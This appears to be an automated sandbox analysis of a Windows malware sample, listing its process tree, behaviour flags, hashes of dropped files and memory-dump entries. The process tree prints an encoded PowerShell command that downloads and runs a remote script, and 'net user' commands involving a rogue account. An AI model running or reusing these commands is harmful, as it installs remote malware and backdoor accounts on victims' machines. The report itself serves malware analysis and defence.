C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES79D9.tmpMD5
735de5a4d38ceb1137c44dc8f4e61eef
SHA1934174487fa9f47c17ae4e548240feca8e6e36b9
SHA256115f3ef59bcc08618db55689a96ab9ed081f690397b4953f4b0573682c87dce7
SHA512fb593063b564798d238ac05b1a8f195019eb36c955f6bca46750198e8e66ab913bd28422e55b383f60e1e05cab2cd77630a5e4a3865f0a298715ded6712a04a9
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
920b50692e0e9c4e32c79f89fafce0c4
SHA14cb71db2bb05daa4e84c649b6c58cbfd20c8e484
SHA25685fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
SHA512966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
-
C:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.dllMD5
564cfb92500724a343fc62886af8f124
SHA1d21628f28d0d011fe0326376326e631e88ac69d7
SHA256330bb1972638ca1a7452892796773da631caf93930c7e2a6aa68a549fb985fb3
SHA5121c7312125d543b768875a1e6ac33866dc771cddfd7baff428666f8db3275ef5052c71ea143b6b7c79c976fbc9099de182a32308106ebd0f14a7f25e616337467
-
\??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\CSC2C10604955244B3BB8E4FF5CA2DE646.TMPMD5
59c8411fea678ce22b0a7902c98e170e
SHA13e459d07f4836529c5565131a42361bed60900b4
SHA25607c70556d3be8283352d88d1d7e845e07beaadb6df77aab5f51a97a2c8d04197
SHA512f8e325c988ab1f64bf018076539aa86732a929dd1d5972fb12bbd7ece577f44d179a9938b0aaa613944646cc912ff565d3927275a5cf283191b16a79d5f64158
-
\??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.cmdlineMD5
5563885b07efbdba15ff19eeec444ba9
SHA17f27f3ff9038db7a3a398438567985071f74b046
SHA256a961e1d08122404998448f796a322c57557f5fd6efeeeff656ec2c6cfc9387b4
SHA512120e686a29fef220c16211136a6471eff0550a77a3e6eb8ea34a6f24c0504e963466899f53663fffeaa71d86e4448ea173e2d9587ae7b952b20e812cac361fa9
-
\Windows\Branding\mediasrv.pngMD5
96a6c5d47b0670a98699b2b424e2e65e
SHA157a31831c368efd82801f94a1b72c7230f4288be
SHA256bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
SHA512b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
-
\Windows\Branding\mediasvc.pngMD5
a3da4eee0a06c45c5bec80fd959ad539
SHA1a8d2d3691af2e1af85ed8947347d0981017b7a32
SHA2568a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
SHA5128d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
memory/188-230-0x0000000000000000-mapping.dmp
-
memory/212-242-0x00000269E5263000-0x00000269E5265000-memory.dmpFilesize
8KB
-
memory/212-243-0x00000269E5266000-0x00000269E5268000-memory.dmpFilesize
8KB
-
memory/212-240-0x0000000000000000-mapping.dmp
-
memory/212-241-0x00000269E5260000-0x00000269E5262000-memory.dmpFilesize
8KB
-
memory/212-244-0x00000269E5268000-0x00000269E5269000-memory.dmpFilesize
4KB
-
memory/512-216-0x0000000000000000-mapping.dmp
-
memory/656-234-0x0000000000000000-mapping.dmp
-
memory/668-117-0x0000023EFDDE3000-0x0000023EFDDE5000-memory.dmpFilesize
8KB
-
memory/668-114-0x0000023EFDDE0000-0x0000023EFDDE2000-memory.dmpFilesize
8KB
-
memory/668-119-0x0000023EFDDE6000-0x0000023EFDDE7000-memory.dmpFilesize
4KB
-
memory/668-115-0x0000023EFE220000-0x0000023EFE641000-memory.dmpFilesize
4.1MB
-
memory/668-118-0x0000023EFDDE5000-0x0000023EFDDE6000-memory.dmpFilesize
4KB
-
memory/1264-200-0x0000000000000000-mapping.dmp
-
memory/1264-205-0x0000028375626000-0x0000028375628000-memory.dmpFilesize
8KB
-
memory/1264-203-0x0000028375623000-0x0000028375625000-memory.dmpFilesize
8KB
-
memory/1264-202-0x0000028375620000-0x0000028375622000-memory.dmpFilesize
8KB
-
memory/1276-221-0x0000000000000000-mapping.dmp
-
memory/1284-246-0x0000000000000000-mapping.dmp
-
memory/1588-178-0x0000017170810000-0x0000017170812000-memory.dmpFilesize
8KB
-
memory/1588-201-0x0000017170818000-0x000001717081A000-memory.dmpFilesize
8KB
-
memory/1588-179-0x0000017170813000-0x0000017170815000-memory.dmpFilesize
8KB
-
memory/1588-182-0x0000017170816000-0x0000017170818000-memory.dmpFilesize
8KB
-
memory/1588-165-0x0000000000000000-mapping.dmp
-
memory/1588-226-0x0000000000000000-mapping.dmp
-
memory/1588-233-0x0000000000000000-mapping.dmp
-
memory/1608-236-0x0000000000000000-mapping.dmp
-
memory/1728-238-0x0000000000000000-mapping.dmp
-
memory/1728-245-0x0000000000000000-mapping.dmp
-
memory/1728-211-0x0000000000000000-mapping.dmp
-
memory/2016-219-0x0000000000000000-mapping.dmp
-
memory/2088-227-0x0000000000000000-mapping.dmp
-
memory/2144-220-0x0000000000000000-mapping.dmp
-
memory/2160-208-0x0000021D62BA6000-0x0000021D62BA8000-memory.dmpFilesize
8KB
-
memory/2160-237-0x0000000000000000-mapping.dmp
-
memory/2160-204-0x0000000000000000-mapping.dmp
-
memory/2160-206-0x0000021D62BA0000-0x0000021D62BA2000-memory.dmpFilesize
8KB
-
memory/2160-209-0x0000021D62BA8000-0x0000021D62BAA000-memory.dmpFilesize
8KB
-
memory/2160-207-0x0000021D62BA3000-0x0000021D62BA5000-memory.dmpFilesize
8KB
-
memory/2164-247-0x0000000000000000-mapping.dmp
-
memory/2172-248-0x0000000000000000-mapping.dmp
-
memory/2228-213-0x0000000000000000-mapping.dmp
-
memory/2232-222-0x0000000000000000-mapping.dmp
-
memory/2236-214-0x0000000000000000-mapping.dmp
-
memory/2360-218-0x0000000000000000-mapping.dmp
-
memory/2364-212-0x0000000000000000-mapping.dmp
-
memory/2392-145-0x0000000000000000-mapping.dmp
-
memory/2500-228-0x0000000000000000-mapping.dmp
-
memory/2504-235-0x0000000000000000-mapping.dmp
-
memory/3028-135-0x0000022B142B0000-0x0000022B142B2000-memory.dmpFilesize
8KB
-
memory/3028-144-0x0000022B142B6000-0x0000022B142B8000-memory.dmpFilesize
8KB
-
memory/3028-158-0x0000022B2F850000-0x0000022B2F851000-memory.dmpFilesize
4KB
-
memory/3028-157-0x0000022B2F4C0000-0x0000022B2F4C1000-memory.dmpFilesize
4KB
-
memory/3028-151-0x0000022B142B8000-0x0000022B142B9000-memory.dmpFilesize
4KB
-
memory/3028-126-0x0000022B16180000-0x0000022B16181000-memory.dmpFilesize
4KB
-
memory/3028-149-0x0000022B161D0000-0x0000022B161D1000-memory.dmpFilesize
4KB
-
memory/3028-131-0x0000022B2EEE0000-0x0000022B2EEE1000-memory.dmpFilesize
4KB
-
memory/3028-136-0x0000022B142B3000-0x0000022B142B5000-memory.dmpFilesize
8KB
-
memory/3028-120-0x0000000000000000-mapping.dmp
-
memory/3120-229-0x0000000000000000-mapping.dmp
-
memory/3576-225-0x0000000000000000-mapping.dmp
-
memory/3724-210-0x0000000000000000-mapping.dmp
-
memory/3744-141-0x0000000000000000-mapping.dmp
-
memory/3892-215-0x0000000000000000-mapping.dmp
-
memory/3964-232-0x0000000000000000-mapping.dmp
-
memory/4020-239-0x0000000000000000-mapping.dmp
-
memory/4020-217-0x0000000000000000-mapping.dmp
-
memory/4056-231-0x0000000000000000-mapping.dmp